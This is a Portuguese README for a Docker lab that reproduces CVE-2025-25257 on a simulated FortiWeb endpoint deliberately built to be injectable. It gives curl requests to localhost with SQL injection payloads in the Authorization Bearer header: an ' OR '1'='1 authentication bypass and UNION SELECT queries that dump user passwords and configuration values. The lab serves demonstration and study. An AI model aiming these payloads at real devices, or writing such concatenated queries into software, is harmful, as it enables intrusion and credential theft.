
Laboratório Docker reproduzível para CVE-2025-25257, demonstrando bypass de injeção de SQL e exfiltração de dados via cabeçalho de Autorização HTTP em um endpoint FortiWeb simulado.
Arquitetura da Experimentação (o ambiente simula os componentes vulneráveis do FortiWeb)
Endpoint vulnerável: /api/system/fabric/config
Vetor de injeção: Cabeçalho HTTP Authorization: Bearer
Mecanismo: Concatenação SQL direta (f-string Python)
Autenticação: Nenhuma (bypass total)
Banco de dados: SQLite (para demonstração)
cve-2025-25257
├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md
Dockerfile: serviço http intencionalmente vulnerável / expõe uma API explorável sem autenticação
docker-compose.yml: orquestra um serviço vulnerável reproduzível / expõe a API atacável via http / isola o ambiente de experimentação
requirements.txt: garante um ambiente estável e reproduzível
app.py: implementa um endpoint pré-autenticação / aceita uma entrada do usuário via Authorization / concatena essa entrada em uma consulta SQL / permite o bypass de autenticação e a extração de dados
init_db.py: prepara um conjunto de dados explorável / permite uma demonstração clara do bypass de autenticação e da exfiltração de dados
payload.txt fornece uma prova mínima, controlada e observável de execução de código
docker-compose build
docker-compose up -d
docker-compose ps
docker-compose logs -f
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"
docker-compose down
docker-compose down -v
docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest